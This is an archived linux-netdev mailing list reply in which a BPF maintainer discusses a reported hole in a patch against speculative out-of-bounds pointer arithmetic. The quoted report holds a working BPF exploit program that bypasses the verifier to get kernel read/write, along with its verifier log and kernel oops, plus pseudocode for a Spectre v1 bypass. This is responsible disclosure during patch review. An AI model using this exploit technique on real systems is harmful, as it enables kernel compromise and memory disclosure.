netdev - Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <e5d87498-c42e-f53b-5637-9013c1d8d3bd@iogearbox.net>
Date:   Fri, 4 Jan 2019 00:22:49 +0100
From:   Daniel Borkmann <daniel@...earbox.net>
To:     Jann Horn <jannh@...gle.com>
Cc:     Alexei Starovoitov <ast@...nel.org>,
        "David S. Miller" <davem@...emloft.net>,
        jakub.kicinski@...ronome.com,
        Network Development <netdev@...r.kernel.org>
Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on
 pointer arithmetic

Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Hi!
> 
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
> 
> On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote:
>> Jann reported that the original commit back in b2157399cc98
>> ("bpf: prevent out-of-bounds speculation") was not sufficient
>> to stop CPU from speculating out of bounds memory access:
>> While b2157399cc98 only focussed on masking array map access
>> for unprivileged users for tail calls and data access such
>> that the user provided index gets sanitized from BPF program
>> and syscall side, there is still a more generic form affected
>> from BPF programs that applies to most maps that hold user
>> data in relation to dynamic map access when dealing with
>> unknown scalars or "slow" known scalars as access offset, for
>> example:
> [...]
>> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
>> +                           struct bpf_insn *insn,
>> +                           const struct bpf_reg_state *ptr_reg,
>> +                           struct bpf_reg_state *dst_reg,
>> +                           bool off_is_neg)
>> +{
> [...]
>> +
>> +       /* If we arrived here from different branches with different
>> +        * limits to sanitize, then this won't work.
>> +        */
>> +       if (aux->alu_state &&
>> +           (aux->alu_state != alu_state ||
>> +            aux->alu_limit != alu_limit))
>> +               return -EACCES;
> 
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
> += reg". This leads to kernel read/write because the code intended to
> ensure safety of the "ptr += reg" case in speculative execution ends
> up clobbering the addend in the "numeric_reg += reg" case:
> 
> source code:
> =============
> int main(void) {
>   int my_map = array_create(8, 30);
>   array_set(my_map, 0, 1);
>   struct bpf_insn insns[] = {
>     // load map value pointer into r0 and r2
>     BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
>     BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
>     BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
>     BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
>     BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
>     BPF_EXIT_INSN(),
> 
>     // load some number from the map into r1
>     BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),
> 
>     // branch A
>     BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
>     BPF_MOV64_IMM(BPF_REG_3, 0),
>     BPF_JMP_A(2),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_2, 0),
>     BPF_MOV64_IMM(BPF_REG_3, 0x100000),
> 
>     // *** COMMON INSTRUCTION ***
>     BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),
> 
>     // branch A
>     BPF_JMP_A(4),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
>     // verifier-confused branch: verifier follows fall-through,
> runtime follows jump
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN(),
> 
>     // fake-dead code; targeted from branch A to prevent dead code sanitization
>     BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN()
>   };
>   int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
>   trigger_proc(sock_fd);
> }
> =============
> 
> verifier output:
> =============
> 0: (18) r1 = 0x0
> 2: (bf) r2 = r10
> 3: (07) r2 += -16
> 4: (7a) *(u64 *)(r10 -16) = 0
> 5: (85) call bpf_map_lookup_elem#1
> 6: (55) if r0 != 0x0 goto pc+1
>  R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 7: (95) exit
> 
> from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 8: (71) r1 = *(u8 *)(r0 +0)
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
> 9: (55) if r1 != 0x0 goto pc+3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 10: (bf) r2 = r0
> 11: (b7) r3 = 0
> 12: (05) goto pc+2
> 15: (0f) r2 += r3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 16: (55) if r1 != 0x0 goto pc+1
> 17: (05) goto pc+4
> 22: (71) r0 = *(u8 *)(r0 +0)
>  R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 23: (b7) r0 = 0
> 24: (95) exit
> 
> from 15 to 16 (speculative execution): safe
> 
> from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 13: (b7) r2 = 0
> 14: (b7) r3 = 1048576
> 15: (0f) r2 += r3
> 16: (55) if r1 != 0x0 goto pc+1
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 17: (05) goto pc+4
> 22: safe
> 
> from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 18: (b7) r0 = 322376503
> 19: (55) if r2 != 0x100000 goto pc+2
> 20: (b7) r0 = 0
> 21: (95) exit
> processed 29 insns (limit 131072), stack depth 16
> =============
> 
> dmesg:
> =============
> [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
> from=test pid=2185
> [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
> 83 ed 28 48
> [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
> 89 7d 18 31
> [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
> 88 ff ff 48
> [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
> 00 00 48 81
> [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
> 73 0c 83 e0
> [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
> 48 83 f8 00
> [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
> 75 10 4c 8b
> [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
> 00 48 83 ff
> [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
> ba 00 00 10
> [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
> d2 49 f7 da
> [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
> ff 00 75 02
> [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
> 10 00 75 04
> [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
> [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
> [ 9948.481562] #PF error: [normal kernel read fault]
> [ 9948.483878] PGD 0 P4D 0
> [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
> [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
> [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.10.2-1 04/01/2014
> [ 9948.494912] RIP: 0010:0xffffffffc01602f3
> [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
> 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
> c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
> cc cc
> [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
> [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
> [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
> [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
> [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
> [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
> [ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
> knlGS:0000000000000000
> [ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
> [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> [ 9948.542581] Call Trace:
> [ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
> [ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
> [ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
> [ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
> [ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
> [ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
> [ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
> [ 9948.558856]  ? unix_stream_connect+0x980/0x980
> [ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
> [ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
> [ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.568463]  ? unix_stream_connect+0x980/0x980
> [ 9948.570397]  ? sock_sendmsg+0x6d/0x80
> [ 9948.571948]  ? sock_write_iter+0x121/0x1c0
> [ 9948.573678]  ? sock_sendmsg+0x80/0x80
> [ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
> [ 9948.576958]  ? iov_iter_init+0x86/0xc0
> [ 9948.578395]  ? __vfs_write+0x294/0x3b0
> [ 9948.579782]  ? kernel_read+0xa0/0xa0
> [ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
> [ 9948.582919]  ? vfs_write+0xe7/0x230
> [ 9948.584228]  ? ksys_write+0xa1/0x120
> [ 9948.585559]  ? __ia32_sys_read+0x50/0x50
> [ 9948.587174]  ? do_syscall_64+0x73/0x160
> [ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
> [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
> [ 9948.593654] CR2: 0000000013371337
> [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
> =============

Good point, thanks for catching this scenario! I'll get this fixed in
order to reject such programs.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
> 
> R0 = <slow map value, known to be 0>;
> R1 = <fast map value>;
> if (R1 != R0) { // mispredicted
>   return 0;
> }
> R3 = <a map value pointer>;
> R2 = <arbitrary 64-bit number>;
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];
> 
> To convince the CPU to predict the second branch the way you want, you
> could probably add another code path that jumps in front of the branch
> with both R2 and R3 already containing valid pointers. Something like
> this:
> 
> if (<some map value>) {
>   R0 = <slow map value, known to be 0>;
>   R1 = <fast map value>;
>   if (R1 != R0) { // mispredicted
>     return 0;
>   }
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;} else {  R3 = <a map value pointer>;
>  R2 = <arbitrary 64-bit number>;  R1 = 1;}
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel